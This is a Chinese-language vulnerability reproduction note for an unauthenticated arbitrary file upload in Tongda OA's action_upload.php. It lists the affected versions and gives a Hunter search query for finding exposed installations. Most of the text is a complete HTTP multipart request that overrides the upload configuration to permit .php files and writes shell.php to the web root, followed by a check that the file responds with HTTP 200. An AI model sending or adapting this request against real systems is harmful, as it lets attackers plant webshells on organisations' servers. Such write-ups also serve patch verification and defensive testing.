通达OA action存在前台任意文件上传漏洞
一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。
二影响版本
- 通达OA 2016 - 通达OA V11.6
三、资产测绘
- hunter
app.name="通达 OA"
- 特征
四、漏洞复现
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 605
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
filename
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
10000
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
shell
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
--00content0boundary00
Content-Disposition: form-data; name="mufile"
submit
--00content0boundary00
Content-Disposition: form-data; name="filename"; filename="shell.php"
<?php echo 123;?>
--00content0boundary00--
上传文件地址为http://ip/shell.php,发起get请求上传后文件地址,响应200,表示存在该漏洞,否则不存在